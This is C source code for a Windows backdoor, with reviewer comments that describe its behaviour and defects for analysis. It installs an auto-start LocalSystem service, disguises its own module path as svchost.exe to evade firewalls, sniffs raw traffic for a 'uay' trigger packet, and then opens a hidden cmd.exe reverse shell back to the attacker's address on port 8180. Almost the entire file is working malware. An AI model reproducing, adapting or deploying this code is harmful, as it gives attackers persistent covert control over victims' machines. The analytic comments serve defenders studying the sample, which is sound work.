#include "stdio.h"
#include "winsock2.h"
#include "winsvc.h"
#include "winuser.h"
#pragma comment (lib,"advapi32.lib")
#pragma comment(lib,"ws2_32.lib")
#define LISPORT 65371
#define PATHLEN 32
typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);
// Hand-copied ntdll UNICODE_STRING. Length/MaximumLength are byte counts by
// Windows convention and Buffer need not be NUL-terminated; main() below
// overwrites an instance of this inside the loader's module list.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Per-drive current-directory record embedded in RTL_USER_PROCESS_PARAMETERS.
// Declared only so the process-parameters layout below has the right size; not
// referenced directly in this file.
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
UNICODE_STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
// Hand-copied PEB_LDR_DATA (undocumented, 32-bit layout). main() walks
// InLoadOrderModuleList.Flink, whose first entry is the main executable.
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
// Hand-copied loader module entry (LDR_DATA_TABLE_ENTRY in later SDKs).
// Only FullDllName is touched here: main() points it at a fake
// "<system dir>\svchost.exe" string so anything that identifies the process
// by its loader entry sees svchost.exe instead of this binary.
typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;
// Hand-copied RTL_USER_PROCESS_PARAMETERS (undocumented, 32-bit, NT 5.x era).
// Present only so PEB::ProcessParameters has a type; nothing in this file
// reads or writes it.
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
PVOID ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StdInputHandle;
HANDLE StdOutputHandle;
HANDLE StdErrorHandle;
UNICODE_STRING CurrentDirectoryPath;
HANDLE CurrentDirectoryHandle;
UNICODE_STRING DllPath;
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
PVOID Environment;
ULONG StartingPositionLeft;
ULONG StartingPositionTop;
ULONG Width;
ULONG Height;
ULONG CharWidth;
ULONG CharHeight;
ULONG ConsoleTextAttributes;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle;
UNICODE_STRING DesktopName;
UNICODE_STRING ShellInfo;
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
// Free-list node referenced by PEB::FreeList; declared for layout only.
typedef struct _PEB_FREE_BLOCK {
struct _PEB_FREE_BLOCK *Next;
ULONG Size;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
// Hand-copied 32-bit PEB layout (undocumented; field offsets vary between
// Windows releases, so only the early fields are reliable). main() obtains a
// pointer to this from fs:[0x30] and reads just LoaderData.
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN Spare;
HANDLE Mutant;
PVOID ImageBaseAddress;
PPEB_LDR_DATA LoaderData; // the only field this program uses
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PPEBLOCKROUTINE FastPebLockRoutine;
PPEBLOCKROUTINE FastPebUnlockRoutine;
ULONG EnvironmentUpdateCount;
PVOID *KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
PPEB_FREE_BLOCK FreeList;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PVOID *ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID **ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, *PPEB;
//////////////////////////////////////////////
//--------------------------------------------------------------------
#include <ws2tcpip.h>
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
// IPv4 header overlay used on raw-socket receive buffers. The two nibble
// bit-fields rely on the compiler placing the first one in the low nibble so
// that headerLength maps to the low 4 bits of the first byte; nothing in the
// sniffer validates headerLength against the received length before using it.
typedef struct _IP{
UCHAR headerLength:4; // IHL, in 32-bit words
UCHAR version:4; // IP version
UCHAR ServiceType; // type of service
WORD TotalLen; // total length
WORD ID; // identification
WORD Flags:3; // flags
WORD FragOff:13; // fragment offset
BYTE TimeToLive; // TTL
BYTE Protocol; // transport protocol (6 == TCP is the only value checked)
WORD HdrChksum; // header checksum
DWORD SrcAddr; // source address (network byte order)
DWORD DstAddr; // destination address (network byte order)
BYTE Options; // first option byte only; a placeholder, not the option list
} IP;
typedef IP * LPIP;
typedef IP UNALIGNED * ULPIP;
typedef IP * LPIP;
typedef IP UNALIGNED * ULPIP;
// TCP header overlay. offset (data offset, in 32-bit words) is read from the
// packet and used unchecked to locate the payload.
typedef struct _TCP{
WORD SrcPort; // source port
WORD DstPort; // destination port
DWORD SeqNum; // sequence number
DWORD AckNum; // acknowledgement number
UCHAR unused:4; // reserved bits
UCHAR offset:4; // data offset
UCHAR flAgs; // control flags
WORD Window; // window size
WORD Chksum; // checksum
WORD UrgPtr; // urgent pointer
} TCP;
typedef TCP *LPTCP;
typedef TCP UNALIGNED * ULPTCP;
typedef struct psd_hdr // TCP pseudo-header (for checksum computation); not referenced in this file
{
unsigned long saddr; // source address
unsigned long daddr; // destination address
char mbz;
char ptcl; // protocol
unsigned short tcpl; // TCP length
}PSD_HEADER,*PPSD_HEADER;
//--------------------------------------------------------------------
typedef struct _uty{// not used anywhere in this program
DWORD number;
char sign[4];
DWORD length;
char dAtA[1024];
}UTY,*PUTY;
/////////////////////////////////////////////////////////////
void ServiceMAin(DWORD dwArgc,LPTSTR* lpszArgv);
void Service_Ctrl(DWORD Opcode);
void OpenBAckDoor();
DWORD WINAPI ProClientThreAd(LPVOID lpPArAm);
SC_HANDLE hSCHAndle;
SERVICE_STATUS ssStAtus;
SERVICE_STATUS_HANDLE ssh;
// Entry point. Two modes, chosen by whether the command line contains a '/':
//   * no '/'  -> installer: deletes any existing service "mybd8.4", registers
//                this executable (command line + " /service") as an auto-start
//                own-process service and starts it;
//   * has '/' -> service mode: rewrites this process's loader entry so its
//                image path reads as "<system dir>\svchost.exe", then hands
//                control to the SCM dispatcher.
// NOTE(review): this is a backdoor installer/loader. The comments document
// what the code does for analysis; the defects noted are left as they are.
// Indicators visible in this file: service name "mybd8.4", display name
// "reAl Control8.4", " /service" argument, spoofed svchost.exe module path.
void main(DWORD dwArgc,LPTSTR *lpszArgv)
{
PPEB peb;
PLDR_MODULE pModule;
char systempAth[PATHLEN*2]; // 64 bytes: hand-widened UTF-16 copy of tempsystempAth
char tempsystempAth[PATHLEN*2];
int i;
LPTSTR PAth,PAth2;
PAth=GetCommandLine();
int ch='/';
PAth2=strchr(PAth,ch);
if (PAth2==NULL){
// The "argument check" is just the presence of '/'. strcat appends to the
// process's own command-line buffer, for which no spare capacity is
// guaranteed, so this write can run past the end of that buffer.
strcat(PAth," /service");
printf("%s\n",PAth);
//return;
// Connect to the SCM with full access (requires administrative rights).
SC_HANDLE hSCMAnAger=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (hSCMAnAger==NULL){
printf("OpenSCMAnAger fAiled\n");
return;
}
// Remove a previous instance. OpenService may return NULL when no such
// service exists; DeleteService(NULL) then fails and the error is printed.
hSCHAndle = OpenService(hSCMAnAger,"mybd8.4",DELETE);
if (!DeleteService(hSCHAndle)){
printf("Error:%d\n",GetLastError());
}
if (hSCMAnAger != NULL) CloseServiceHandle (hSCMAnAger);
// Reopen the SCM (the handle was closed just above).
hSCMAnAger=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (hSCMAnAger==NULL){
printf("OpenSCMAnAger fAiled\n");
return;
}
// Create the service. Account is NULL (LocalSystem per CreateService's
// documented default), binary path is this command line + " /service".
hSCHAndle=CreateService(hSCMAnAger,
"mybd8.4",// service key name; need not match the executable's name
"reAl Control8.4",// display name shown in the services tool
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,// own process: the SCM ignores the name in the dispatch table in service mode
SERVICE_AUTO_START,// starts at boot
SERVICE_ERROR_IGNORE,// start failures are not logged
PAth,
NULL,
NULL,
NULL,
NULL,
NULL);
// If the service already exists, open it instead. Any other failure (for
// instance if the deleted instance is still marked for deletion -- not
// verified here) leaves hSCHAndle NULL and StartService below fails.
if (hSCHAndle==NULL){
if (GetLastError()==ERROR_SERVICE_EXISTS){
hSCHAndle= OpenService(hSCMAnAger,"mybd8.4",SERVICE_ALL_ACCESS);
if (hSCHAndle==NULL) {
printf("Open Service fAiled\n");
//return;
}
}
}
//DeleteService(hSCHAndle);
// Start the service; the QueryServiceStatus loop only drives the "..."
// progress display while the state is START_PENDING.
if (StartService(hSCHAndle,0,0)){
while(QueryServiceStatus(hSCHAndle,&ssStAtus)){
if (ssStAtus.dwCurrentState == SERVICE_START_PENDING){
printf(".");
Sleep(20);
}else{
break;
}
}
}else{
printf("StArt service fAiled:%d\n",GetLastError());
}
if (hSCMAnAger != NULL) CloseServiceHandle(hSCMAnAger);
}else{// service mode (launched by the SCM with " /service")
// "Get past the firewall": make the main module look like svchost.exe so a
// per-application host-firewall rule for svchost applies to this process.
// PATHLEN (32) is passed as the size although the array holds 64 bytes; if
// the system directory needs more than 31 characters GetSystemDirectory
// writes nothing and strcat then operates on an uninitialized buffer.
GetSystemDirectory(tempsystempAth,PATHLEN);
strcat(tempsystempAth,"\\svchost.exe");
// Hand-rolled ASCII -> UTF-16LE widening: copies exactly PATHLEN chars, so
// the result is not guaranteed to carry a terminating wide NUL.
for (i=0;i<PATHLEN;i++){
systempAth[i*2]=tempsystempAth[i];
systempAth[i*2+1]=0;
}
// Fetch the PEB pointer from the TEB (fs:[0x30] on 32-bit Windows).
__asm
{
mov eax,fs:0x30
mov peb,eax
}
// First entry in load order is the main executable's loader entry.
pModule= (LDR_MODULE*)peb->LoaderData ->InLoadOrderModuleList .Flink;
// Length 200 / MaximumLength 202 bytes exceed the 64-byte systempAth buffer,
// so readers of FullDllName see stack bytes beyond the spoofed path.
pModule->FullDllName .MaximumLength = 202;
pModule->FullDllName .Length = 200;
//printf("%S\n",pModule->FullDllName .Buffer );
pModule->FullDllName .Buffer = (unsigned short*)systempAth; // points into main's stack frame, which lives as long as the dispatcher below blocks
//printf("%S\n",pModule->FullDllName .Buffer );
///////////////////////////////////////////////////////////////////////////////////
// Dispatch table naming ServiceMAin as the service entry. The name "mybd8.2"
// differs from the registered "mybd8.4"; for SERVICE_WIN32_OWN_PROCESS the
// SCM does not check it.
SERVICE_TABLE_ENTRY ste[2];
ste[0].lpServiceName = "mybd8.2";
ste[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMAin;
ste[1].lpServiceName = NULL;
ste[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ste); // blocks for the lifetime of the service
}
}
//--------------------------------------------------------------------
// SCM entry point for the service. Registers the control handler, reports
// RUNNING, then runs the sniffer loop (OpenBAckDoor) on this thread. That
// loop never returns normally, so the service stays RUNNING until the
// process dies. dwArgc/lpszArgv are ignored.
void ServiceMAin(DWORD dwArgc,LPTSTR *lpszArgv)
{
// Register the handler for start/pause/stop controls (same name mismatch as
// the dispatch table: "mybd8.2" vs the registered "mybd8.4").
ssh=RegisterServiceCtrlHandler("mybd8.2",(LPHANDLER_FUNCTION)Service_Ctrl);
// Opcode 0 is not a control code; it hits the default branch and reports RUNNING.
Service_Ctrl(0);
Sleep(100);// copied from example code; the author did not know why it is there
///MessageBox(NULL,"hi service","",0); // never shows: services have no interactive desktop (WinSta0)
//MessageBox(NULL,"hi","hi",MB_DEFAULT_DESKTOP_ONLY);
OpenBAckDoor();
}
//--------------------------------------------------------------------
// Service control handler. Rebuilds a SERVICE_STATUS on every call and reports
// STOPPED for SERVICE_CONTROL_STOP, RUNNING for every other Opcode.
// NOTE(review): a STOP request only changes the *reported* state; nothing
// signals OpenBAckDoor's loop, so the sniffer keeps running after the SCM
// shows the service as stopped. SERVICE_ACCEPT_SHUTDOWN is advertised but
// SERVICE_CONTROL_SHUTDOWN falls into the default (RUNNING) branch.
void Service_Ctrl(DWORD Opcode)
{
SERVICE_STATUS serst;
serst.dwServiceType =SERVICE_WIN32;
serst.dwControlsAccepted =SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
serst.dwWin32ExitCode =NO_ERROR;
serst.dwServiceSpecificExitCode = 0;
serst.dwCheckPoint = 0;
serst.dwWaitHint = 0;
switch(Opcode){
case SERVICE_CONTROL_STOP:
serst.dwCurrentState = SERVICE_STOPPED; // reported only; the process does not exit
SetServiceStatus(ssh,&serst);
break;
default:
serst.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus(ssh,&serst);
}
}
//--------------------------------------------------------------------
// Port-less trigger listener. Opens a raw socket with SIO_RCVALL (captures
// every IP packet arriving at the host's first address; needs the privileges
// the service has), then scans each TCP payload addressed to this host for
// the marker "uay". Expected trigger text, as parsed below:
//     uay:<this host's IP>:<callback IP>:
// When the first address matches the local address, ProClientThreAd is
// started to connect back to <callback IP>:8180 with a cmd.exe shell.
// Never returns; exit() is called on socket/bind failure.
// NOTE(review): the parser copies attacker-controlled payload with strcpy into
// 32-byte stack buffers -- anyone who can reach this host with the trigger
// string can overflow the backdoor itself. Defects are noted inline, not fixed.
void OpenBAckDoor()
{
SOCKET sniffersock;
WSADATA WSAdAtA;
BOOL flAg = TRUE; // unused
SOCKADDR_IN host;
int ret;
IP *ip;
TCP *tcp;
DWORD dwVAlue;
char hostnAme[32];
struct hostent *locAl;
char destip[32];
char myip[32];
char buff[2048];
char* tcpdAtA;
//MessageBox(NULL,"open bAckdoor","hi",MB_DEFAULT_DESKTOP_ONLY);
WSAStartup(MAKEWORD(2,2),&WSAdAtA);
// socket() reports failure as INVALID_SOCKET; the SOCKET_ERROR comparison
// only works because both convert to the same all-ones value.
if ((sniffersock = socket(AF_INET,SOCK_RAW,IPPROTO_IP)) ==SOCKET_ERROR){
printf("socket fAiled: %d\n",GetLastError());
exit(-1);
}
// Resolve the host's own first address; locAl is dereferenced without a NULL check.
gethostname(hostnAme,32);
locAl = gethostbyname(hostnAme);
host.sin_addr = *(PIN_ADDR)locAl->h_addr_list [0];
host.sin_family = AF_INET;
host.sin_port = htons(81); // port is irrelevant for a raw IP socket
if (bind(sniffersock,(PSOCKADDR)&host,sizeof(host)) == SOCKET_ERROR){
printf("bind fAiled: %d\n",GetLastError());
exit(-1);
}
// Enable promiscuous receive of all IP traffic on this interface; result unchecked.
dwVAlue = 1;
ioctlsocket(sniffersock,SIO_RCVALL,&dwVAlue);
while(1){
// Zeroing gives strstr a terminator -- unless the packet fills all 2048
// bytes, in which case the payload scan can run off the end of buff.
memset(buff,0,2048);
ret = recv(sniffersock,buff,2048,0);
if (ret >0){
ip = (IP*)buff;
//MessageBox(NULL,"one pAcket","hi",MB_DEFAULT_DESKTOP_ONLY);
// Only TCP destined for this host's address (round-tripped through inet_ntoa/inet_addr).
if (ip->Protocol == 6 && ip->DstAddr == inet_addr(inet_ntoa(host.sin_addr)))
{
//MessageBox(NULL,"received one pAcket","hi",MB_DEFAULT_DESKTOP_ONLY);
// Header lengths come straight from the packet and are not checked against ret.
tcp = (TCP*)(buff + ip->headerLength * 4);
tcpdAtA = buff + ip->headerLength *4 + tcp->offset*4;
if (strstr(tcpdAtA,"uay") != NULL){
//MessageBox(NULL,tcpdAtA,"tcp dAtA",MB_DEFAULT_DESKTOP_ONLY);
//strcpy(tcpdAtAbuff,tcpdAtA);
// Copy everything after "uay...:" into myip (unbounded strcpy into 32 bytes),
// then cut at the next ':'. strstr may return NULL here -> wild index.
// If no ':' follows "uay", myip is left uninitialized for the strcmp below.
if(strstr(strstr(tcpdAtA,"uay"),":") != NULL){
strcpy(myip,strstr(strstr(tcpdAtA,"uay"),":")+1);
myip[strstr(myip,":")-myip] = '\0';
}
//MessageBox(NULL,inet_ntoa(host.sin_addr),"inet_ntoa(host.sin_addr)",MB_DEFAULT_DESKTOP_ONLY);
// Trigger fires only when the first field equals this host's address.
if (strcmp(inet_ntoa(host.sin_addr),myip) == 0){
// The callback address is whatever followed the ':' just overwritten:
// read from past myip's terminator, copied unbounded, cut at the next ':'
// (again without a NULL check on strstr).
strcpy(destip,myip+strlen(myip)+1);
destip[strstr(destip,":")-destip] = '\0';
//MessageBox(NULL,myip,"myip",MB_DEFAULT_DESKTOP_ONLY);
//MessageBox(NULL,destip,"destip",MB_DEFAULT_DESKTOP_ONLY);
if (TRUE){ // leftover condition, always taken
// destip is this frame's buffer; the thread copies it immediately but a
// second trigger can overwrite it before that copy happens.
if (CreateThread(NULL,0,ProClientThreAd,(PVOID)destip,0,NULL) == NULL){
printf("creAtethreAd fAiled: %d\n",GetLastError());
continue;
}
}
}
}
}
}
}
return;
}
//--------------------------------------------------------------------------
// Reverse-shell worker. lpPArAm points at a dotted-quad string (copied at once,
// unbounded, into a 32-byte local). Connects to that address on TCP port 8180,
// launches a hidden cmd.exe with its stdin/stdout/stderr on anonymous pipes,
// and pumps bytes between the socket and the pipes until a read/write fails.
// Returns 0. NOTE(review): connect(), CreatePipe() and CreateProcess() results
// are never checked; no handle or socket is closed on exit, and cmd.exe is
// left running when the loop breaks.
DWORD WINAPI ProClientThreAd(LPVOID lpPArAm)
{
int ret;
char Buff[1024];
char destip[32];
WSADATA WSAdAtA;
strcpy(destip,(char*)lpPArAm); // unbounded copy from the sniffer's stack buffer
SOCKET destsock;
SOCKADDR_IN dest;
dest.sin_family = AF_INET;
dest.sin_port = htons(8180); // hard-coded callback port
dest.sin_addr.S_un .S_addr = inet_addr(destip);
WSAStartup(MAKEWORD(2,2),&WSAdAtA); // once per thread; never paired with WSACleanup
destsock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
ret = connect(destsock,(struct sockaddr*)&dest,sizeof(dest)); // result ignored
// Inheritable pipe ends so the child can use them as its standard handles.
SECURITY_ATTRIBUTES sA;
sA.nLength = sizeof(sA);
sA.bInheritHandle = true;
sA.lpSecurityDescriptor = 0;
HANDLE hReAdPipe1,hWritePipe1,hReAdPipe2,hWritePipe2;
ret=CreatePipe(&hReAdPipe1,&hWritePipe1,&sA,0); // pipe 1: child output -> this thread
ret=CreatePipe(&hReAdPipe2,&hWritePipe2,&sA,0); // pipe 2: this thread -> child input
STARTUPINFO si={sizeof(si)};
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReAdPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
char cmdLine[]="cmd.exe";
PROCESS_INFORMATION ProcessInformAtion;
// bInheritHandles=1 passes every inheritable handle in this process to cmd.exe,
// which on Windows presumably includes the socket as well -- not verified here.
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformAtion);
unsigned long lBytesReAd; // not initialized; only written when PeekNamedPipe succeeds
while(1){
Sleep(100); // polling loop, 10 Hz
// lBytesReAd receives the number of bytes peeked into Buff (<= 1024).
ret=PeekNamedPipe(hReAdPipe1,Buff,1024,&lBytesReAd,0,0);
if(lBytesReAd){
// Shell output available: drain exactly that many bytes and send them.
ret=ReadFile(hReAdPipe1,Buff,lBytesReAd,&lBytesReAd,0);
if(!ret) break;
ret = send(destsock,Buff,lBytesReAd,0);
if (ret<=0) break;
}else{
// No output pending: block on the socket for operator input.
// recv returns int; SOCKET_ERROR (-1) stored in the unsigned lBytesReAd is
// not caught by "<=0" and is passed to WriteFile as a huge length.
lBytesReAd = recv(destsock,Buff,1024,0);
if(lBytesReAd<=0) break;
ret = WriteFile(hWritePipe2,Buff,lBytesReAd,&lBytesReAd,0);
if(!ret) break;
}
}
return 0;
}
//--------------------------------------------------------------------
//--------------------writen by uty@uaty -----------------------//